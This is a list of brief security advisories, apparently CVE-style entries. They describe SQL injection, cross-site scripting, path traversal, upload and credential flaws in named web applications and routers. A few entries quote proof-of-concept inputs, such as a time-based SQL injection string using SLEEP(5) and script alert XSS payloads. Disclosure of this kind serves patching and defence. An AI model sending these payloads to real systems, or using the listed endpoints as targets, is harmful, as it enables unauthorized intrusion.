A vulnerability has been found in CodeCanyon RISE Ultimate Project Manager 3.7.0 and classified as critical. This vulnerability affects unknown code of the file /index.php/dashboard/save. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component.
A vulnerability, which was classified as critical, was found in code-projects Hospital Management System 1.0. This affects an unknown part of the file check_availability.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in playSMS 1.4.4/1.4.5/1.4.6/1.4.7. Affected is an unknown function of the file /playsms/index.php?app=main&amp;inc=core_auth&amp;route=forgot&amp;op=forgot of the component Template Handler. The manipulation of the argument username/email/captcha leads to code injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The project maintainer was informed early about the issue. Investigation shows that playSMS up to 1.4.3 contained a fix but later versions re-introduced the flaw. As long as the latest version of the playsms/tpl package is used, the software is not affected. Version &gt;=1.4.4 shall fix this issue for sure.
A vulnerability, which was classified as problematic, has been found in xiaohe4966 TpMeCMS up to 1.3.3.1. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.3.2 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as critical was found in vedees wcms up to 0.3.2. Affected by this vulnerability is an unknown functionality of the file /wex/finder.php. The manipulation of the argument p leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in code-projects Crud Operation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file savedata.php. The manipulation of the argument sname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Perfex CRM 3.1.6. It has been declared as problematic. This vulnerability affects unknown code of the file application/controllers/Clients.php of the component Parameter Handler. The manipulation of the argument message leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.
A vulnerability was found in AutoCMS 5.4. It has been classified as problematic. This affects an unknown part of the file /admin/robot.php. The manipulation of the argument sidebar leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in QDocs Smart School Management System 7.0.0. Affected by this vulnerability is an unknown functionality of the file /user/chat/mynewuser of the component Chat. The manipulation of the argument users[] with the input 1'+AND+(SELECT+3220+FROM+(SELECT(SLEEP(5)))ZNun)+AND+'WwBM'%3d'WwBM as part of POST Request Parameter leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 7.0.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as problematic has been found in OpenTibiaBR MyAAC up to 0.8.16. Affected is an unknown function of the file system/pages/forum/new_post.php of the component Post Reply Handler. The manipulation of the argument post_topic leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The patch is identified as bf6ae3df0d32fa22552bb44ca4f8489a6e78cc1c. It is recommended to apply a patch to fix this issue.
A vulnerability was found in code-projects Crud Operation System 1.0. It has been classified as critical. This affects an unknown part of the file /updatedata.php. The manipulation of the argument sid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in SourceCodester Food Ordering Management System 1.0. Affected by this issue is some unknown functionality of the file /includes/. The manipulation leads to exposure of information through directory listing. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in code-projects Inventory Management 1.0. Affected by this vulnerability is an unknown functionality of the file /model/viewProduct.php of the component Products Table Page. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Best House Rental Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file categories.php. The manipulation leads to cross site scripting. The attack may be initiated remotely.
A vulnerability, which was classified as problematic, has been found in Kaon CG3000 1.01.43. Affected by this issue is some unknown functionality of the component dhcpcd Command Handler. The manipulation of the argument -h with the input &lt;script&gt;alert('XSS')&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in TDuckCloud TDuckPro up to 6.3. Affected by this vulnerability is an unknown functionality. The manipulation leads to weak password recovery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Mercury MNVR816 up to 2.0.1.0.5. It has been classified as problematic. This affects an unknown part of the file /web-static/. The manipulation leads to files or directories accessible. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in itsourcecode Tailoring Management System 1.0. Affected by this vulnerability is an unknown functionality of the file ssms.php. The manipulation of the argument customer leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in SourceCodester Best House Rental Management System 1.0. Affected is an unknown function of the file /index.php?page=tenants of the component New Tenant Page. The manipulation of the argument Last Name/First Name/Middle Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in code-projects Inventory Management 1.0. This vulnerability affects unknown code of the file /view/registration.php of the component Registration Form. The manipulation with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in SourceCodester Online Food Ordering System 2.0. This affects an unknown part of the file index.php of the component Create an Account Page. The manipulation of the argument First Name/Last Name leads to cross site scripting. It is possible to initiate the attack remotely.
A vulnerability was found in SourceCodester Online Bank Management System and Online Bank Management System - 1.0. It has been classified as problematic. This affects an unknown part of the file /mfeedback.php of the component Feedback Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Food Ordering Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument description leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in TOTOLINK AC1200 T8 4.1.5cu.861_B20230220. This vulnerability affects unknown code of the file /etc/shadow.sample. The manipulation leads to use of hard-coded password. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in erjemin roll_cms up to 1484fe2c4e0805946a7bcf46218509fcb34883a9. It has been classified as problematic. This affects an unknown part of the file roll_cms/roll_cms/views.py. The manipulation leads to information exposure through error message. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.
A vulnerability was found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /inccatadd.php. The manipulation of the argument title leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in code-projects Hospital Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file user-login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in itsourcecode Payroll Management System 1.0. This issue affects some unknown processing of the file /ajax.php?action=delete_deductions. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in code-projects Online Shop Store 1.0. This vulnerability affects unknown code of the file /settings.php. The manipulation of the argument error leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodesters Clinics Patient Management System 2.0. It has been rated as critical. This issue affects some unknown processing of the file /print_diseases.php. The manipulation of the argument disease/from/to leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester PHP CRUD 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/update.php. The manipulation of the argument tbl_person_id/first_name/middle_name/last_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester PHP CRUD 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/update.php. The manipulation of the argument first_name/middle_name/last_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester PHP CRUD 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /endpoint/Add.php. The manipulation of the argument first_name/middle_name/last_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester PHP CRUD 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /endpoint/delete.php of the component Delete Person Handler. The manipulation of the argument person leads to sql injection. The attack can be launched remotely.
A vulnerability, which was classified as critical, was found in SourceCodester Simple Invoice Generator System 1.0. Affected is an unknown function of the file /save_invoice.php. The manipulation of the argument invoice_code/customer/cashier/total_amount/discount_percentage/discount_amount/tendered_amount leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Food Menu 1.0. This issue affects some unknown processing of the file /endpoint/delete-menu.php. The manipulation of the argument menu leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in SourceCodester Food Ordering Management System 1.0. This vulnerability affects unknown code of the file /foms/routers/place-order.php of the component Price Handler. The manipulation of the argument total leads to improper validation of specified quantity in input. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Food Ordering Management System 1.0. This affects an unknown part of the file /foms/routers/cancel-order.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Clinics Patient Management System 2.0. It has been classified as problematic. Affected is an unknown function of the file congratulations.php. The manipulation of the argument goto_page leads to open redirect. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Clinics Patient Management System 2.0 and classified as problematic. This issue affects some unknown processing of the file /users.php. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Windmill 1.380.0. It has been classified as problematic. Affected is an unknown function of the file backend/windmill-api/src/users.rs of the component HTTP Request Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 1.390.1 is able to address this issue. The patch is identified as acfe7786152f036f2476f93ab5536571514fa9e3. It is recommended to upgrade the affected component.
A vulnerability, which was classified as problematic, was found in D-Link DNS-320 2.02b01. This affects an unknown part of the file /cgi-bin/discovery.cgi of the component Web Management Interface. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.
A vulnerability, which was classified as problematic, has been found in D-Link DNS-320 2.02b01. Affected by this issue is some unknown functionality of the file /cgi-bin/widget_api.cgi of the component Web Management Interface. The manipulation of the argument getHD/getSer/getSys leads to information disclosure. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.
A vulnerability was found in &amp;#20113;&amp;#35838;&amp;#32593;&amp;#32476;&amp;#31185;&amp;#25216;&amp;#26377;&amp;#38480;&amp;#20844;&amp;#21496; Yunke Online School System up to 1.5.5. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/educloud/videobind.html. The manipulation leads to inclusion of sensitive information in source code. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.6 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in SourceCodester Food Ordering Management System 1.0. It has been classified as critical. This affects an unknown part of the file /routers/ticket-status.php. The manipulation of the argument ticket_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Food Ordering Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /routers/add-ticket.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Insurance Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in LinuxOSsk Shakal-NG up to 1.3.3. Affected is an unknown function of the file comments/views.py. The manipulation of the argument next leads to open redirect. It is possible to launch the attack remotely. The name of the patch is ebd1c2cba59cbac198bf2fd5a10565994d4f02cb. It is recommended to apply a patch to fix this issue.
A vulnerability, which was classified as problematic, has been found in ABCD ABCD2 up to 2.2.0-beta-1. This issue affects some unknown processing of the file /buscar_integrada.php. The manipulation of the argument Sub_Expresion leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in ABCD ABCD2 up to 2.2.0-beta-1. This vulnerability affects unknown code of the file /abcd/opac/php/otros_sitios.php. The manipulation of the argument sitio leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in ABCD ABCD2 up to 2.2.0-beta-1. This affects an unknown part of the file /common/show_image.php. The manipulation of the argument image leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in alwindoss akademy up to 35caccea888ed63d5489e211c99edff1f62efdba. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file cmd/akademy/handler/handlers.go. The manipulation of the argument emailAddress leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable.
A vulnerability was found in SourceCodester Contact Manager with Export to VCF 1.0. It has been rated as critical. This issue affects some unknown processing of the file /endpoint/delete-account.php of the component Delete Contact Handler. The manipulation of the argument contact leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in Grocy up to 4.2.0. This vulnerability affects unknown code of the file /api/files/recipepictures/ of the component SVG File Upload Handler. The manipulation of the argument force_serve_as with the input picture' leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. Unfortunately, the project maintainer does not want to be quoted in any way regarding the dispute rationale. The security policy of the project implies that this finding is "practically irrelevant" due to authentication requirements.
A vulnerability was found in code-projects Hospital Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in HM Courts &amp; Tribunals Service Probate Back Office up to c1afe0cdb2b2766d9e24872c4e827f8b82a6cd31. It has been classified as problematic. Affected is an unknown function of the file src/main/java/uk/gov/hmcts/probate/service/NotificationService.java of the component Markdown Handler. The manipulation leads to injection. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as d90230d7cf575e5b0852d56660104c8bd2503c34. It is recommended to apply a patch to fix this issue.
A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /index.php?id=userProfileEdit of the component Update My Profile Page. The manipulation of the argument fname/lname/email with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Music Gallery Site 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /classes/Users.php?f=delete. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Campcodes Supplier Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/edit_area.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SourceCodester Sentiment Based Movie Rating System 1.0. Affected is an unknown function of the file /classes/Users.php?f=save_client of the component User Registration Handler. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Petshop Management System 1.0. This issue affects some unknown processing of the file /controllers/add_client.php. The manipulation of the argument image_profile leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Petshop Management System 1.0. This vulnerability affects unknown code of the file /controllers/add_user.php. The manipulation of the argument avatar leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Electric Billing Management System 1.0. This affects an unknown part of the file /Actions.php?a=login. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Electric Billing Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /?page=tracks of the component Connection Code Handler. The manipulation of the argument code leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in HFO4 shudong-share 2.4.7. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /includes/fileReceive.php of the component File Extension Handler. The manipulation of the argument file leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability, which was classified as problematic, has been found in SourceCodester Contact Manager with Export to VCF 1.0. Affected by this issue is some unknown functionality of the file index.html. The manipulation of the argument contact_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Music Gallery Site 1.0. Affected by this vulnerability is an unknown functionality of the file /php-music/classes/Master.php?f=delete_music. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in OpenRapid RapidCMS up to 1.3.1. Affected is an unknown function of the file /resource/runlogon.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in master-nan Sweet-CMS up to 5f441e022b8876f07cde709c77b5be6d2f262e3f. It has been declared as critical. This vulnerability affects unknown code of the file /table/index. The manipulation leads to sql injection. The attack can be initiated remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 146359646a5a90cb09156dbd0013b7df77f2aa6c. It is recommended to apply a patch to fix this issue.
A vulnerability was found in OpenRapid RapidCMS up to 1.3.1. It has been classified as critical. This affects an unknown part of the file /admin/user/user-move-run.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in jpress up to 5.1.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/template/edit of the component Template Module Handler. The manipulation leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in dingfanzu CMS up to 29d67d9044f6f93378e6eb6ff92272217ff7225c. This affects an unknown part of the file /ajax/getBasicInfo.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in dingfanzu CMS up to 29d67d9044f6f93378e6eb6ff92272217ff7225c. It has been rated as critical. Affected by this issue is some unknown functionality of the file /ajax/chpwd.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in dingfanzu CMS up to 29d67d9044f6f93378e6eb6ff92272217ff7225c. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /ajax/checkin.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in SourceCodester Music Gallery Site 1.0. This vulnerability affects unknown code of the file /classes/Master.php?f=delete_category. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Music Gallery Site 1.0. This affects an unknown part of the file /admin/?page=musics/manage_music. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Music Gallery Site 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/categories/manage_category.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file staffedit.php. The manipulation of the argument id/stafftype/address/fullname/phonenumber/salary leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Responsive Hotel Site 1.0. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument name/phone/email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Online Quiz Site 1.0 and classified as critical. This issue affects some unknown processing of the file index.php. The manipulation of the argument loginid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester E-Commerce Website 1.0 and classified as critical. This vulnerability affects unknown code of the file /Admin/registration.php. The manipulation of the argument fname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in nafisulbari/itsourcecode Insurance Management System 1.0. Affected by this issue is some unknown functionality of the file editPayment.php of the component Payment Handler. The manipulation of the argument recipt_no leads to improper access controls. The attack may be launched remotely. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in nafisulbari/itsourcecode Insurance Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file addClient.php. The manipulation of the argument CLIENT ID leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in nafisulbari/itsourcecode Insurance Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file editClient.php. The manipulation of the argument AGENT ID leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in code-projects Blood Bank System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /login.php of the component Login Page. The manipulation of the argument user leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in code-projects Blood Bank System 1.0. Affected is an unknown function of the file /login.php of the component Login Page. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in SourceCodester QR Code Attendance System 1.0. This issue affects some unknown processing of the file /endpoint/delete-student.php. The manipulation of the argument student/attendance leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in itsourcecode Tailoring Management System 1.0. This vulnerability affects unknown code of the file staffcatedit.php. The manipulation of the argument title leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in SourceCodester Zipped Folder Manager App 1.0. This affects an unknown part of the file /endpoint/add-folder.php. The manipulation of the argument folder leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Online Quiz Site 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file signupuser.php. The manipulation of the argument lid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Online Bus Reservation Site 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument Username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Job Portal 1.0. It has been classified as critical. Affected is an unknown function of the file /forget.php. The manipulation of the argument email/mobile leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Ruijie EG2000K 11.1(6)B2 and classified as critical. This vulnerability affects unknown code of the file /tool/index.php?c=download&amp;a=save. The manipulation of the argument content leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in TOTOLINK T10 AC1200 4.1.8cu.5207. Affected is an unknown function of the file /squashfs-root/web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to hard-coded credentials. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in SourceCodester QR Code Bookmark System 1.0. Affected is an unknown function of the file /endpoint/update-bookmark.php of the component Parameter Handler. The manipulation of the argument tbl_bookmark_id/name/url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester QR Code Bookmark System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /endpoint/delete-bookmark.php. The manipulation of the argument bookmark leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester QR Code Bookmark System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /endpoint/add-bookmark.php of the component Parameter Handler. The manipulation of the argument name/url leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Interactive Map with Marker 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/delete-mark.php. The manipulation of the argument mark leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Pharmacy Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /index.php?action=editPharmacist. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in code-projects Pharmacy Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /index.php?action=editSalesman. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in ClassCMS 4.8. Affected by this issue is some unknown functionality of the file /index.php/admin of the component Article Handler. The manipulation of the argument Title leads to basic cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in ClassCMS 4.8. Affected by this vulnerability is an unknown functionality of the file /index.php/admin of the component Logo Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Daily Calories Monitoring Tool 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /endpoint/delete-calorie.php. The manipulation of the argument calorie leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Daily Calories Monitoring Tool 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/add-calorie.php. The manipulation of the argument calorie_date/calorie_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Task Progress Tracker 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file update-task.php. The manipulation of the argument task_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in itsourcecode E-Commerce Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file search_list.php. The manipulation of the argument user leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Record Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file search_user.php. The manipulation of the argument search leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in SourceCodester Record Management System 1.0. This affects an unknown part of the file sort1_user.php. The manipulation of the argument position leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in thinkgem JeeSite 5.3. It has been rated as problematic. This issue affects some unknown processing of the file /js/a/login of the component Cookie Handler. The manipulation of the argument skinName leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester E-Commerce System 1.0. It has been classified as critical. Affected is an unknown function of the file /ecommerce/admin/products/controller.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester E-Commerce System 1.0 and classified as critical. This issue affects some unknown processing of the file /ecommerce/popup_Item.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
